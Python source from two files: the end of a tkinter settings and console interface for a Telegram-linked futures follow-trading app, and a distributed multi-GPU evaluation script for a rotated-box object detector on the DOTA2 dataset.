self.close_price_adjust_interval_frame.grid(row=2, column=0, sticky=tk.W) tk.Label(self.close_price_adjust_interval_frame, text="平倉調整價格區間", font=self.label_font_style, width=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_LABEL_PADDING_X, pady=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_LABEL_PADDING_Y) self.close_price_adjust_interval_var = tk.StringVar() self.close_price_adjust_interval_var.trace(tk.W, lambda name, index, mode, sv=self.close_price_adjust_interval_var: self.trade_setting_entry_on_change(sv, "close_price_adjust_interval", constants.TkinterEntryType.POSITIVE_INTEGER)) self.close_price_adjust_interval_entry = tk.Entry(self.close_price_adjust_interval_frame, textvariable=self.close_price_adjust_interval_var, width=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_INPUT_WIDTH, justify='center') self.close_price_adjust_interval_entry.bind('<Control-v>', lambda e: 
'break') self.close_price_adjust_interval_entry.grid(row=0, column=1, padx=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_INPUT_PADDING_X, pady=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_INPUT_PADDING_Y) self.cancel_unfulfilled_order_after_second_frame = tk.Frame(self.trade_setting_frame_2) self.cancel_unfulfilled_order_after_second_frame.grid(row=3, column=0, sticky=tk.W) tk.Label(self.cancel_unfulfilled_order_after_second_frame, text="等待", font=self.label_font_style, width=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_1_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_PADDING_X, pady=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_PADDING_Y) self.cancel_unfulfilled_order_after_second_var = tk.StringVar() self.cancel_unfulfilled_order_after_second_var.trace(tk.W, lambda name, index, mode, sv=self.cancel_unfulfilled_order_after_second_var: self.trade_setting_entry_on_change(sv, "cancel_unfulfilled_order_after_second", constants.TkinterEntryType.FLOAT)) self.cancel_unfulfilled_order_after_second_entry = \ tk.Entry(self.cancel_unfulfilled_order_after_second_frame, textvariable=self.cancel_unfulfilled_order_after_second_var, width=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_INPUT_WIDTH, justify='center') self.cancel_unfulfilled_order_after_second_entry \ .grid(row=0, column=1, padx=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_INPUT_PADDING_X, pady=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_INPUT_PADDING_Y, sticky=tk.E) self.cancel_unfulfilled_order_after_second_entry.bind('<Control-v>', lambda e: 'break') tk.Label(self.cancel_unfulfilled_order_after_second_frame, text="秒後取消未成交的建倉訂單", font=self.label_font_style, width=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_2_WIDTH, anchor=tk.W) \ .grid(row=0, column=2, padx=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_PADDING_X , pady=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_PADDING_Y) self.trade_only_within_second_frame = 
tk.Frame(self.trade_setting_frame_2) self.trade_only_within_second_frame.grid(row=4, column=0, sticky=tk.W) tk.Label(self.trade_only_within_second_frame, text="忽略延誤", font=self.label_font_style, width=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_1_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_PADDING_X, pady=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_PADDING_Y) self.trade_only_within_second_var = tk.StringVar() self.trade_only_within_second_var.trace(tk.W, lambda name, index, mode, sv=self.trade_only_within_second_var: self.trade_setting_entry_on_change(sv, "trade_only_within_second", constants.TkinterEntryType.FLOAT)) self.trade_only_within_second_entry = tk.Entry(self.trade_only_within_second_frame, textvariable=self.trade_only_within_second_var, width=UI.Main.TRADE_ONLY_WITHIN_SECOND_INPUT_WIDTH, justify='center') self.trade_only_within_second_entry.bind('<Control-v>', lambda e: 'break') self.trade_only_within_second_entry.grid(row=0, column=1, padx=UI.Main.TRADE_ONLY_WITHIN_SECOND_INPUT_PADDING_X, pady=UI.Main.TRADE_ONLY_WITHIN_SECOND_INPUT_PADDING_Y, sticky=tk.E) tk.Label(self.trade_only_within_second_frame, text="秒以上的交易訊息", font=self.label_font_style, width=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_2_WIDTH, anchor=tk.W) \ .grid(row=0, column=2, padx=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_PADDING_X, pady=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_PADDING_Y) self.trade_setting_frame_3 = tk.Frame(self.trade_setting_frame, width=UI.Main.TRADE_SETTING_FRAME_3_WIDTH, height=trade_setting_frame_height - 20, padx=0, pady=frame_padding_y) self.trade_setting_frame_3.grid(row=0, column=2, sticky=tk.NE) self.trade_setting_frame_3.grid_propagate(False) self.trade_setting_frame_3.grid_rowconfigure(0, weight=1) self.trade_setting_frame_3.grid_columnconfigure(0, weight=1) self.manual_confirm_trade_message_var = tk.BooleanVar() self.manual_confirm_trade_message = tk.Checkbutton(self.trade_setting_frame_3, text="手動確認每筆交易", font=self.label_font_style, 
var=self.manual_confirm_trade_message_var, command=partial(self.trade_setting_checkbox_on_change, self.manual_confirm_trade_message_var, "manual_confirm_trade_message")) self.manual_confirm_trade_message.grid(row=0, column=0, pady=UI.Main.MANUAL_CONFIRM_TRADE_MESSAGE_CHECKBOX_PADDING_Y, sticky=tk.NE) self.start_button_font_style = tk.font.Font(size=UI.Main.START_BUTTON_FONT_SIZE) self.start_follow_trade_button = tk.Button(self.trade_setting_frame_3, text="開始", font=self.start_button_font_style, command=lambda: self.run_async_task(self.start_follow_trade)) self.start_follow_trade_button.grid(row=1, column=0, sticky=tk.NE, padx=UI.Main.START_BUTTON_PADDING_X, pady=UI.Main.START_BUTTON_PADDING_Y) self.setting_trade_app_frame.grid(row=0) self.console_trade_app_frame.grid(row=1) self.remark_trade_app_frame.grid(row=2, sticky=tk.E, padx=frame_padding_x) scrollbar = tk.Scrollbar(self.console_trade_app_frame) console_text_font = tk.font.Font(size=UI.Main.CONSOLE_TEXT_FONT_SIZE) console_text_font_bold = tk.font.Font(size=UI.Main.CONSOLE_TEXT_FONT_SIZE, name="bold") console_text_font_bold.configure(weight="bold") self.console_text = tk.Text(self.console_trade_app_frame, width=UI.Main.CONSOLE_TEXT_WIDTH, height=UI.Main.CONSOLE_TEXT_HEIGHT, wrap="word", bg=constants.Color.DARK, fg=constants.Color.TEXT, yscrollcommand=scrollbar.set, borderwidth=0, highlightthickness=0, font=console_text_font, selectbackground=constants.Color.CONSTRAST, state=tk.DISABLED) scrollbar.config(command=self.console_text.yview) scrollbar.pack(side=tk.RIGHT, fill=tk.Y) self.console_text.pack(side=tk.LEFT, fill=tk.BOTH, expand=True) self.console_text.tag_config(constants.TkinterTextColorTag.LogTime.TITLE, foreground=constants.TkinterTextColorTag.LogTime.FG_COLOR) self.console_text.tag_config(constants.TkinterTextColorTag.Success.TITLE, background=constants.TkinterTextColorTag.Success.BG_COLOR) self.console_text.tag_config(constants.TkinterTextColorTag.Warning.TITLE, 
background=constants.TkinterTextColorTag.Warning.BG_COLOR)
        # NOTE(review): the line above is the tail of a tag_config(...) call whose start
        # lies before this chunk; everything down to ``self.app = trade_app`` is the end
        # of the UI-construction method of the trade-app GUI class.
        self.console_text.tag_config(constants.TkinterTextColorTag.Error.TITLE,
                                     background=constants.TkinterTextColorTag.Error.BG_COLOR)
        self.console_text.tag_config(constants.TkinterTextColorTag.Info.TITLE,
                                     background=constants.TkinterTextColorTag.Info.BG_COLOR)
        self.console_text.tag_config(constants.TkinterTextColorTag.Sharp.TITLE,
                                     foreground=constants.TkinterTextColorTag.Sharp.FG_COLOR)
        self.console_trade_app_frame.grid(row=1)
        # "Clear" button floats over the console area.
        self.clear_console_button = tk.Button(self.console_trade_app_frame, text="清除",
                                              font=self.label_font_style, command=self.clear_console)
        self.clear_console_button.place(x=UI.Main.CLEAR_CONSOLE_BUTTON_X,
                                        y=UI.Main.CLEAR_CONSOLE_BUTTON_Y)
        # Footer links: disclaimer and GitHub repository.
        self.disclaimer_link = tk.Label(self.remark_trade_app_frame, text="免責聲明",
                                        fg="blue", cursor="hand2")
        self.disclaimer_link.grid(row=0, column=0, sticky=tk.E)
        self.disclaimer_link.bind("<Button-1>", lambda e: self.load_disclaimer(read_only=True))
        self.github_link = tk.Label(self.remark_trade_app_frame, text="GitHub",
                                    fg="blue", cursor="hand2")
        self.github_link.grid(row=0, column=1, sticky=tk.E)
        self.github_link.bind("<Button-1>", lambda e: utils.open_link(constants.GITHUB_REPO_LINK))
        self.app = trade_app

    def load_trade_app_config(self):
        """Populate every widget/Tk variable from the persisted config.

        Restores the previously selected Telegram dialog (if it still exists),
        the trade port, and all trade settings, then re-applies the
        enable/disable rules via trade_mode_checkbox_on_change().
        """
        default_telegram_dialog_id = self.config.get_default_telegram_dialog_id()
        trade_port = self.config.get_trade_port()
        if default_telegram_dialog_id is not None and default_telegram_dialog_id != "":
            default_telegram_dialog_id = int(default_telegram_dialog_id)
            telegram_dialog_id_list = [dialog['id'] for dialog in self.telegram_dialog_list]
            if default_telegram_dialog_id in telegram_dialog_id_list:
                dialog_index = telegram_dialog_id_list.index(default_telegram_dialog_id)
                if dialog_index >= 0:
                    self.dialog_select.current(dialog_index)
                    self.dialog_select_on_select()
        self.trade_port_var.set(trade_port)
        # Settings are stored as strings; checkbox settings use the "Y"/"N" convention.
        trade_mode = self.config.get_trade_setting("trade_mode")
        trade_product_hsi = self.config.get_trade_setting("trade_product_hsi") == "Y"
        trade_product_mhi = self.config.get_trade_setting("trade_product_mhi") == "Y"
        hsi_trade_quantity = self.config.get_trade_setting("hsi_trade_quantity")
        mhi_trade_quantity = self.config.get_trade_setting("mhi_trade_quantity")
        hsi_margin = self.config.get_trade_setting("hsi_margin")
        mhi_margin = self.config.get_trade_setting("mhi_margin")
        trade_period_morning = self.config.get_trade_setting("trade_period_morning") == "Y"
        trade_period_afternoon = self.config.get_trade_setting("trade_period_afternoon") == "Y"
        trade_period_night = self.config.get_trade_setting("trade_period_night") == "Y"
        open_extra_price = self.config.get_trade_setting("open_extra_price")
        close_price_adjust_interval = self.config.get_trade_setting("close_price_adjust_interval")
        cancel_unfulfilled_order_after_second = self.config.get_trade_setting(
            "cancel_unfulfilled_order_after_second")
        trade_only_within_second = self.config.get_trade_setting("trade_only_within_second")
        manual_confirm_trade_message = self.config.get_trade_setting("manual_confirm_trade_message")
        self.trade_mode_var.set(trade_mode)
        self.trade_product_hsi_var.set(trade_product_hsi)
        self.trade_product_mhi_var.set(trade_product_mhi)
        # Re-apply the mode-dependent enable/disable rules before filling entries.
        self.trade_mode_checkbox_on_change()
        self.hsi_trade_quantity_var.set(hsi_trade_quantity)
        self.mhi_trade_quantity_var.set(mhi_trade_quantity)
        self.hsi_margin_var.set(hsi_margin)
        self.mhi_margin_var.set(mhi_margin)
        self.trade_period_morning_var.set(trade_period_morning)
        self.trade_period_afternoon_var.set(trade_period_afternoon)
        self.trade_period_night_var.set(trade_period_night)
        self.open_extra_price_var.set(open_extra_price)
        self.close_price_adjust_interval_var.set(close_price_adjust_interval)
        self.cancel_unfulfilled_order_after_second_var.set(cancel_unfulfilled_order_after_second)
        self.trade_only_within_second_var.set(trade_only_within_second)
        self.manual_confirm_trade_message_var.set(manual_confirm_trade_message)

    def dialog_select_on_select(self, var=''):
        """Handle selection of a Telegram dialog: persist the choice, enable the
        per-dialog widgets and load any saved message templates."""
        self.selected_dialog_id = self.telegram_dialog_list[self.dialog_select.current()]['id']
        self.config.save_default_telegram_dialog_id(self.selected_dialog_id)
        self.enable_elements(
            self.dialog_save_setting_button,
            self.dialog_test_button,
            self.open_buy_template_entry,
            self.close_buy_template_entry,
            self.open_sell_template_entry,
            self.close_sell_template_entry,
            self.time_format_entry
        )
        dialog_setting = self.config.get_telegram_dialog_setting(self.selected_dialog_id)
        if dialog_setting is not None:
            self.open_buy_template_var.set(dialog_setting['open_buy_template'])
            self.close_buy_template_var.set(dialog_setting['close_buy_template'])
            self.open_sell_template_var.set(dialog_setting['open_sell_template'])
            self.close_sell_template_var.set(dialog_setting['close_sell_template'])
            self.time_format_var.set(dialog_setting['time_format'])
        else:
            # No saved setting for this dialog -> blank out the template fields.
            self.open_buy_template_var.set('')
            self.close_buy_template_var.set('')
            self.open_sell_template_var.set('')
            self.close_sell_template_var.set('')
            self.time_format_var.set('')

    async def refresh_dialog_list(self, *args):
        # Placeholder — presumably implemented elsewhere/overridden; TODO confirm.
        pass

    async def test_dialog_setting(self, *args):
        # Placeholder — presumably implemented elsewhere/overridden; TODO confirm.
        pass

    def save_dialog_setting(self):
        """Persist the message templates for the currently selected dialog."""
        if self.selected_dialog_id is not None:
            self.disable_elements(self.dialog_save_setting_button)
            self.config.save_telegram_dialog_setting(self.selected_dialog_id,
                                                     self.open_buy_template_entry.get(),
                                                     self.close_buy_template_entry.get(),
                                                     self.open_sell_template_entry.get(),
                                                     self.close_sell_template_entry.get(),
                                                     self.time_format_entry.get()
                                                     )
            self.config.save()
            self.console_write_line("成功儲存頻道訊息設定")
            messagebox.showinfo("頻道設定", "成功儲存訊息設定")
            # NOTE(review): after() expects a callable, but enable_elements(...) is
            # *called* here and its result (None) is what gets scheduled — so the
            # button is re-enabled immediately, not after 100 ms. Probably meant
            # ``after(100, lambda: self.enable_elements(...))``.
            self.dialog_save_setting_button.after(100, self.enable_elements(self.dialog_save_setting_button))

    @staticmethod
    def enable_elements(*elements):
        """Enable widgets; Comboboxes become 'readonly' so users can pick but not type."""
        for element in elements:
            if type(element) == tk.ttk.Combobox:
                element['state'] = "readonly"
            else:
                element['state'] = tk.NORMAL

    @staticmethod
    def disable_elements(*elements):
        """Disable every widget passed in."""
        for element in elements:
            element['state'] = tk.DISABLED

    def trade_port_entry_on_change(self, sv):
        """Sanitise the trade-port entry (digits only, max 5 chars) and persist it."""
        max_port_length = 5
        port = sv.get()
        port = ''.join([n for n in port if n.isdigit()])
        sv.set(port)
        if len(port) > max_port_length:
            port = port[:max_port_length]
            sv.set(port)
        if self.config.get_trade_port() != port:
            self.config.save_trade_port(port)

    def trade_setting_entry_on_change(self, sv, code, value_type):
        """Sanitise a settings entry according to ``value_type`` and persist it
        under setting key ``code`` when it changed."""
        value = sv.get()
        if value_type == constants.TkinterEntryType.POSITIVE_INTEGER:
            # Digits only.
            value = ''.join([n for n in value if n.isdigit()])
        elif value_type == constants.TkinterEntryType.INTEGER:
            # Digits, plus an optional leading minus sign.
            value = ''.join([value[i] for i in range(len(value))
                             if value[i].isdigit() or (i == 0 and value[i] == "-")])
        elif value_type == constants.TkinterEntryType.FLOAT:
            # Digits with at most one decimal point.
            has_dot = False
            values = []
            for n in value:
                if n.isdigit():
                    values.append(n)
                elif n == "." and has_dot is False:
                    has_dot = True
                    values.append(n)
            value = ''.join(values)
        sv.set(value)
        if self.config.get_trade_setting(code) != value:
            self.config.set_trade_setting(code, value)
            self.config.save()

    async def validate_trade_account_setting(self):
        # Placeholder — presumably implemented elsewhere/overridden; TODO confirm.
        pass

    async def test_trade_account_setting(self, *args):
        # Placeholder — presumably implemented elsewhere/overridden; TODO confirm.
        pass

    def get_raw_trade_settings(self):
        """Collect the current (unvalidated) trade settings from the UI into a dict."""
        trade_mode = self.trade_mode_var.get()
        trade_product_hsi = self.trade_product_hsi_var.get()
        trade_product_mhi = self.trade_product_mhi_var.get()
        hsi_trade_quantity = self.hsi_trade_quantity_var.get()
        # NOTE(review): reads the Entry widget directly while every other field reads
        # its Tk variable — inconsistent; confirm whether mhi_trade_quantity_var
        # was intended here.
        mhi_trade_quantity = self.mhi_trade_quantity_entry.get()
        hsi_margin = self.hsi_margin_var.get()
        mhi_margin = self.mhi_margin_var.get()
        trade_period_morning = self.trade_period_morning_var.get()
        trade_period_afternoon = self.trade_period_afternoon_var.get()
        trade_period_night = self.trade_period_night_var.get()
        open_extra_price = self.open_extra_price_var.get()
        close_price_adjust_interval = self.close_price_adjust_interval_var.get()
        cancel_unfulfilled_order_after_second = self.cancel_unfulfilled_order_after_second_var.get()
        trade_only_within_second = self.trade_only_within_second_var.get()
        manual_confirm_trade_message = self.manual_confirm_trade_message_var.get()
        return {
            'trade_mode': trade_mode,
            'trade_product_hsi': trade_product_hsi,
            'trade_product_mhi': trade_product_mhi,
            'hsi_trade_quantity': hsi_trade_quantity,
            'mhi_trade_quantity': mhi_trade_quantity,
            'hsi_margin': hsi_margin,
            'mhi_margin': mhi_margin,
            'trade_period_morning': trade_period_morning,
            'trade_period_afternoon': trade_period_afternoon,
            'trade_period_night': trade_period_night,
            'open_extra_price': open_extra_price,
            'close_price_adjust_interval': close_price_adjust_interval,
            'cancel_unfulfilled_order_after_second': cancel_unfulfilled_order_after_second,
            'trade_only_within_second': trade_only_within_second,
            'manual_confirm_trade_message': manual_confirm_trade_message
        }

    async def validate_trade_setting(self, *args):
        # Placeholder — presumably implemented elsewhere/overridden; TODO confirm.
        pass

    def trade_mode_checkbox_on_change(self, force_update=False):
        """Enable/disable the quantity vs. margin entries to match the selected
        trade mode, then persist the mode.

        ``force_update`` re-applies the rules even when the mode did not change.
        """
        trade_mode = self.trade_mode_var.get()
        if force_update is True or trade_mode != self.selected_trade_mode:
            self.selected_trade_mode = trade_mode
            if trade_mode == constants.TradeMode.FIXED_QUANTITY:
                # Fixed quantity: quantity entries follow the product checkboxes;
                # margin entries are always disabled.
                if self.trade_product_hsi_var.get() is True:
                    self.enable_elements(self.hsi_trade_quantity_entry)
                else:
                    self.disable_elements(self.hsi_trade_quantity_entry)
                if self.trade_product_mhi_var.get() is True:
                    self.enable_elements(self.mhi_trade_quantity_entry)
                else:
                    self.disable_elements(self.mhi_trade_quantity_entry)
                self.disable_elements(self.hsi_margin_entry, self.mhi_margin_entry)
            elif trade_mode == constants.TradeMode.MAX_QUANTITY:
                # Max quantity: the inverse — margin entries follow the checkboxes.
                if self.trade_product_hsi_var.get() is True:
                    self.enable_elements(self.hsi_margin_entry)
                else:
                    self.disable_elements(self.hsi_margin_entry)
                if self.trade_product_mhi_var.get() is True:
                    self.enable_elements(self.mhi_margin_entry)
                else:
                    self.disable_elements(self.mhi_margin_entry)
                self.disable_elements(self.hsi_trade_quantity_entry, self.mhi_trade_quantity_entry)
            self.config.set_trade_setting("trade_mode", trade_mode)
            self.config.save()

    def trade_product_checkbox_on_change(self):
        """Persist the HSI/MHI product checkboxes and refresh which entries are editable."""
        trade_product_hsi = "Y" if self.trade_product_hsi_var.get() is True else "N"
        trade_product_mhi = "Y" if self.trade_product_mhi_var.get() is True else "N"
        self.config.set_trade_setting("trade_product_hsi", trade_product_hsi)
        self.config.set_trade_setting("trade_product_mhi", trade_product_mhi)
        self.config.save()
        # Disable everything first, then re-enable what the current mode allows.
        self.disable_elements(self.hsi_margin_entry, self.mhi_margin_entry,
                              self.hsi_trade_quantity_entry, self.mhi_trade_quantity_entry)
        trade_mode = self.trade_mode_var.get()
        if trade_mode == constants.TradeMode.FIXED_QUANTITY:
            if trade_product_hsi == "Y":
                self.enable_elements(self.hsi_trade_quantity_entry)
            if trade_product_mhi == "Y":
                self.enable_elements(self.mhi_trade_quantity_entry)
        elif trade_mode == constants.TradeMode.MAX_QUANTITY:
            if trade_product_hsi == "Y":
                self.enable_elements(self.hsi_margin_entry)
            if trade_product_mhi == "Y":
                self.enable_elements(self.mhi_margin_entry)

    def trade_setting_checkbox_on_change(self, value, code):
        """Persist a BooleanVar checkbox under setting key ``code`` as "Y"/"N"."""
        value = "Y" if value.get() is True else "N"
        self.config.set_trade_setting(code, value)
        self.config.save()

    def console_insert_empty_line(self):
        # The console Text widget is kept DISABLED; enable it briefly to write.
        self.enable_elements(self.console_text)
        self.console_text.insert(tk.END, "\n")
        self.disable_elements(self.console_text)
        self.console_text.see(tk.END)

    def console_write_line(self, message, tag=""):
        """Append a timestamped line to the console, log it, and mirror it to the
        user's own Telegram chat ('me')."""
        self.enable_elements(self.console_text)
        time_str = utils.get_local_datetime_str_in_default_format()
        self.console_text.insert(tk.END, time_str, constants.TkinterTextColorTag.LogTime.TITLE)
        self.console_text.insert(tk.END, "\t\t")
        if "\n" not in message:
            # Wrap single-line messages to the console width.
            console_message = (constants.TEXTWRAP_SEPARATOR + " ").join(textwrap.wrap(message, width=65))
        else:
            console_message = message
        self.console_text.insert(tk.END, console_message, tag)
        self.console_text.insert(tk.END, "\n")
        logger.info("[CONSOLE]" + time_str + " " + message)
        self.run_async_task(self.tg.client.send_message, 'me', f"[TFT] {message}")
        self.disable_elements(self.console_text)
        self.console_text.see(tk.END)

    def console_write_text(self, message, tag="", is_start=False, is_end=False):
        """Append a message fragment to the console.

        ``is_start`` stamps the time and resets the line cache; ``is_end``
        flushes the cached line to the logger and to Telegram.
        """
        self.enable_elements(self.console_text)
        if is_start:
            time_str = utils.get_local_datetime_str_in_default_format()
            self.console_text.insert(tk.END, time_str, constants.TkinterTextColorTag.LogTime.TITLE)
            self.console_text.insert(tk.END, "\t\t")
            self.console_text_cache = ""
            self.console_text_cache_time = time_str
        log_message = message
        if constants.TEXTWRAP_SEPARATOR in message:
            # The wrap separator is display-only; strip it from the logged copy.
            log_message = message.replace(constants.TEXTWRAP_SEPARATOR, "")
        self.console_text.insert(tk.END, message, tag)
        self.console_text_cache += log_message
        if is_end:
            self.console_text.insert(tk.END, "\n")
            logger.info("[CONSOLE]" + self.console_text_cache_time + " " + self.console_text_cache)
            self.run_async_task(self.tg.client.send_message, 'me', f"[TFT] {self.console_text_cache}")
            self.console_text_cache = ""
            self.console_text_cache_time = ""
        self.disable_elements(self.console_text)
        self.console_text.see(tk.END)

    def clear_console(self):
        """Erase all console output."""
        self.enable_elements(self.console_text)
        self.console_text.delete(1.0, tk.END)
        self.disable_elements(self.console_text)

    def async_thread(self, func, *args):
        # Runs coroutine func(*args) to completion on the app's event loop.
        self.async_loop.run_until_complete(func(*args))

    def run_async_task(self, *args):
        """Run coroutine ``args[0]`` with arguments ``args[1:]`` on a daemon thread."""
        t = threading.Thread(target=self.async_thread, args=args)
        t.daemon = True
        t.start()

    async def start_follow_trade(self, *args):
        # Placeholder — presumably implemented elsewhere/overridden; TODO confirm.
        pass

    def stop_follow_trade(self):
        # Placeholder — presumably implemented elsewhere/overridden; TODO confirm.
        pass

    def get_elements_to_be_disabled_on_start_follow_trade(self):
        """All widgets that must be frozen while follow-trading is running."""
        return (self.dialog_select, self.dialog_test_button, self.dialog_update_button,
                self.dialog_save_setting_button, self.open_buy_template_entry,
                self.close_buy_template_entry, self.open_sell_template_entry,
                self.close_sell_template_entry, self.time_format_entry,
                self.trade_password_entry, self.trade_port_entry,
                self.trade_password_test_button, self.trade_mode_fixed_quantity,
                self.trade_mode_max_quantity, self.trade_product_hsi,
                self.trade_product_mhi, self.hsi_trade_quantity_entry,
                self.mhi_trade_quantity_entry, self.hsi_margin_entry,
                self.mhi_margin_entry, self.trade_period_morning,
                self.trade_period_afternoon, self.trade_period_night,
                self.open_extra_price_entry, self.close_price_adjust_interval_entry,
                self.cancel_unfulfilled_order_after_second_entry,
                self.trade_only_within_second_entry, self.manual_confirm_trade_message)

    def disable_elements_on_start_follow_trade(self):
        """Freeze the settings UI when follow-trading starts."""
        self.disable_elements(*self.get_elements_to_be_disabled_on_start_follow_trade())

    def enable_elements_on_stop_follow_trade(self):
        """Unfreeze the settings UI when follow-trading stops."""
        self.enable_elements(*self.get_elements_to_be_disabled_on_start_follow_trade())
        # Re-apply mode rules so only the entries valid for the mode stay enabled.
        self.trade_mode_checkbox_on_change(True)
evaluate_dist.py
"""Distributed (multi-GPU, NCCL) evaluation of a rotated-box detector on DOTA2.

Each worker process runs main() on one GPU over a DistributedSampler shard,
maps detections from padded/resized patches back to source-image coordinates,
and pushes per-image results into a shared Manager dict. The parent then runs
rotated-box NMS per source image and writes DOTA Task1 submission files.
"""
import sys
sys.path.append('.')
import os
import tqdm
import torch
import random
import shutil
import argparse
import numpy as np
import multiprocessing
from collections import defaultdict
from torch.utils.data import DataLoader
from data.aug import ops
from data.dataset import DOTA2
from data.aug.compose import Compose
from data.dataset.dota2 import NAMES
from model.net import Net
from model.backbone import resnet
from utils.utils import hyp_parse
from utils.box.bbox_np import xywha2xy4, xy42xywha
from utils.box.rbbox_np import rbbox_batched_nms
from utils.parallel import CustomDetDataParallel
from torch import distributed as dist
from torch.nn import SyncBatchNorm


def set_seed(seed):
    # Seed every RNG source used here (python, numpy, torch CPU + all GPUs)
    # so each worker process is deterministic.
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)


@torch.no_grad()
def main(args, rank, world_size, res):
    """Evaluate this rank's shard of the test set and merge results into `res`.

    :param args: parsed CLI arguments (uses args.ckpt)
    :param rank: GPU/process index of this worker
    :param world_size: total number of workers
    :param res: multiprocessing.Manager().dict() shared with the parent
    """
    torch.cuda.set_device(rank)
    dist.init_process_group("nccl", init_method='env://', rank=rank, world_size=world_size)
    set_seed(0)
    torch.backends.cudnn.benchmark = True
    backbone = resnet.resnet101
    batch_size = 8
    num_workers = 4
    image_size = 768
    data_dir = 'data/DOTA2'
    dir_save = 'weights/dota2_weight'
    image_set = 'test'
    checkpoint = os.path.join(dir_save, args.ckpt)
    # Pad each patch to a square, then resize to the network input size.
    aug = Compose([ops.PadSquare(), ops.Resize(image_size)])
    dataset = DOTA2(data_dir, image_set, aug)
    test_sampler = torch.utils.data.distributed.DistributedSampler(dataset, world_size, rank)
    # NOTE(review): drop_last=True silently discards up to batch_size-1 test
    # samples per rank — for *evaluation* this biases the result; confirm.
    batch_sampler = torch.utils.data.BatchSampler(test_sampler, batch_size, drop_last=True)
    loader = DataLoader(dataset, batch_sampler=batch_sampler,
                        num_workers=num_workers, pin_memory=True, collate_fn=dataset.collate)
    num_classes = len(dataset.names)
    prior_box = {
        'strides': [8, 16, 32, 64, 128],
        'sizes': [3] * 5,
        'aspects': [[1, 2, 4, 8]] * 5,
        'scales': [[2 ** 0, 2 ** (1 / 3), 2 ** (2 / 3)]] * 5,
    }
    conf_thresh = 0.01
    cfg = {
        'prior_box': prior_box,
        'num_classes': num_classes,
        'extra': 2,
        'conf_thresh': conf_thresh,
    }
    device = torch.device(f'cuda:{rank}')
    model = Net(backbone(fetch_feature=True), cfg)
    model.build_pipe(shape=[2, 3, image_size, image_size])
    model = SyncBatchNorm.convert_sync_batchnorm(model)
    model.to(device)
    model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[rank])
    model.module.load_state_dict(torch.load(checkpoint, map_location=device))
    model.eval()
    ret_raw = defaultdict(list)
    for images, targets, infos in tqdm.tqdm(loader):
        images = images.cuda() / 255
        dets = model(images)
        for (det, info) in zip(dets, infos):
            if det:
                bboxes, scores, labels = det
                bboxes = bboxes.cpu().numpy()
                scores = scores.cpu().numpy()
                labels = labels.cpu().numpy()
                # Patch filenames encode "<source>-<x>-<y>-<w>-<h>" — the patch's
                # offset and size within the original source image.
                fname, x, y, w, h = os.path.splitext(os.path.basename(info['img_path']))[0].split('-')[:5]
                x, y, w, h = int(x), int(y), int(w), int(h)
                long_edge = max(w, h)
                pad_x, pad_y = (long_edge - w) // 2, (long_edge - h) // 2
                # Undo resize + square padding, then translate back into
                # source-image coordinates.
                bboxes = np.stack([xywha2xy4(bbox) for bbox in bboxes])
                bboxes *= long_edge / image_size
                bboxes -= [pad_x, pad_y]
                bboxes += [x, y]
                bboxes = np.stack([xy42xywha(bbox) for bbox in bboxes])
                ret_raw[fname].append([bboxes, scores, labels])
    # NOTE(review): dict.update replaces whole keys — if two ranks both hold
    # patches of the same source image, one rank's detections overwrite the
    # other's. Confirm patches of one source image never span ranks.
    res.update(ret_raw)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Distributed evaluation for DOTA2 dataset...')
    parser.add_argument('--gpus', help='num of gpus')
    parser.add_argument('--ckpt', help='checkpoint')
    parser.add_argument('--use_voc07', help='voc07 or voc10 metric')
    parser.add_argument('--local_rank', default=-1, type=int, help='node rank for distributed training')
    args = parser.parse_args()
    nms_thresh = 0.45
    multiprocessing.set_start_method('spawn')
    if ',' in args.gpus:
        # Explicit GPU list, e.g. "--gpus 0,2": pin CUDA_VISIBLE_DEVICES then
        # renumber the visible devices 0..n-1.
        # NOTE(review): eval() on a CLI string — int(x) would be safer.
        device_ids = [eval(x) for x in args.gpus.split(',') if len(x) != 0]
        os.environ["CUDA_VISIBLE_DEVICES"] = ','.join([str(id) for id in device_ids])
        device_ids = list(range(len(device_ids)))
    else:
        device_ids = [x for x in range(int(eval(args.gpus)))]
    res = multiprocessing.Manager().dict()
    processes = []
    for device_id in device_ids:
        p = multiprocessing.Process(target=main, args=(args, device_id, len(device_ids), res))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
    print('merging results...')
    # Per source image: concatenate every patch's detections and run
    # class-aware rotated NMS to remove duplicates from overlapping patches.
    ret = []
    for fname, dets in res.items():
        bboxes, scores, labels = zip(*dets)
        bboxes = np.concatenate(list(bboxes))
        scores = np.concatenate(list(scores))
        labels = np.concatenate(list(labels))
        keeps = rbbox_batched_nms(bboxes, scores, labels, nms_thresh)
        ret.append([fname, [bboxes[keeps], scores[keeps], labels[keeps]]])
    print('converting to submission format...')
    # DOTA submission format: one file per class, one "<image> <score> <8 coords>"
    # line per detection.
    ret_save = defaultdict(list)
